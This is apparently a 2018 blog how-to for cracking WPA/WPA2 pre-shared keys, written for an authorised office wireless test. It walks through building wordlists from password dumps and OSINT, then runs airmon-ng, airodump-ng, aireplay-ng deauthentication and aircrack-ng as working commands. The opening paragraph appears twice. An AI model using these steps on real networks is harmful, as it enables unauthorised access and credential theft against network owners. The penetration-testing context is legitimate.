05 Dec 2018

HOWTO - Cracking WPA/WPA2 pre-shared keys

I was given the opportunity to run some tests against the wireless infrastructure at my office. The actual scenario is to deploy a rogue access point and start gathering intel on the organization. But I decided to take this a step further and do some pre-work to make a convincing rogue AP. What follows is my initial framework that I developed researching how to crack a WPA/WPA2 pre-shared key network. I’ll revisit this and improve on it as I gain more experience.

I was given the opportunity to run some tests against the wireless infrastructure at my office. The actual scenario is to deploy a rogue access point and start gathering intel on the organization. But I decided to take this a step further and do some pre-work to make a convincing rogue AP. What follows is my initial framework that I developed researching how to crack a WPA/WPA2 pre-shared key network. I’ll revisit this and improve on it as I gain more experience.

Goal

The goal of this exercise is the gain the pre-shared key used on the WPA/WPA2 wireless network. This key will be used to setup a realistic looking rogue access point.

Recon

  • Build your Word Lists for brute forcing
    • Grab some of the password dumps available on the internet
    • OSINT your target(s) to build a list of words and phrases commonly used to build passwords (family and pet names, important dates like birthdays, favorite places, etc.)
    • once you determine website(s), use CEWL to harvest possible wordlist entries
    • cupp
    • Sort and filter your list to remove duplicates.
      • sort file > newfile to alpha sort only
      • sort file | uniq [-i to ignore case if you want] > newfile
    • put anything you think might have a higher probability of success near the front of the wordlist.
    • Use Mentalist to generate alternative/mangled words based on your base word lists.

The word lists you generate can likely be re-used for other bruteforcing attacks against the target.

Attack

Get the WPA Authentication

  • determine wireless interface chipset/capabilities (if you do not already know) * needs to allow RFMON
    • lsusb -vv OR lspci -vv to find the card/driver info
    • Or the old standby - open the case and look at the card’s labelling.
  • iwconfig to get interface name (e.g. wlan0)
  • airmon-ng check kill - what exactly does this do besides kill the supplicant?
  • airmon-ng start wlan0 - stops the interface, then starts wlan0mon monitoring interface
    • there may be a better way to do this by manually stopping everything - need to investigate more
  • airodump-ng wlan0mon to survey to find the available networks. Look for what you know or suspect is the clients.
    • Be cautious about neighboring wireless networks you are not authorized to test.
    • Could use airodump-ng -essid [clientssid] wlan0mon if you already know the ssid being used to narrow things down.
    • Once you have found the target make note the BSSID and channel, then hit Ctrl-C to stop the monitor.
  • airodump-ng -c [channel] --bssid [target-bssid] -w /path/to/capture/to creates the required monitoring files.
    • Watch for a bit and make sure this ap is active (if there are multiple ap’s, it might not be.)
    • Note the client MAC for a few of the stronger clients being actively used
    • Leave this terminal open for now to determine if you caught the WPA handshake (note will display in the top line of airodump-ng)
  • Open a new terminal to deauth a client to try and catch the reauth
  • aireplay-ng -0 2 -a [target-bssid] -c [target-client] To try force deauth
    • I had problems using -0 10 or higher when trying to grab a client from a multi-ap network on a cisco wireless controller. There may have been some anti-hacking protections coming into place…need to research.
    • Cross your fingers and hope the client reauths to the same AP.
    • If you do not catch the first client reauth, try the second or try again. Just try not to be too obvious and make problems for the client.
  • If you cannot catch the WPA auth, try look at troubleshooting in Sunny Hoi’s post mentioned below.
  • If you successfully catch the WPA authenciation, you can shut down the capture.
  • You may need to reboot kali before you can get back on the wireless as a client. (Is there another way?)

Cracking the WPA Password

  • Pull the capture files down to your cracking machine if it is different from your capture machine.
  • aircrack-ng -a2 -b [target-bssid] -w /path/to/word/list /path/to/capture.cap
  • let it churn until it finds the password (or not)

Wireless interface cards used successfully:

Credit Where Credit is Due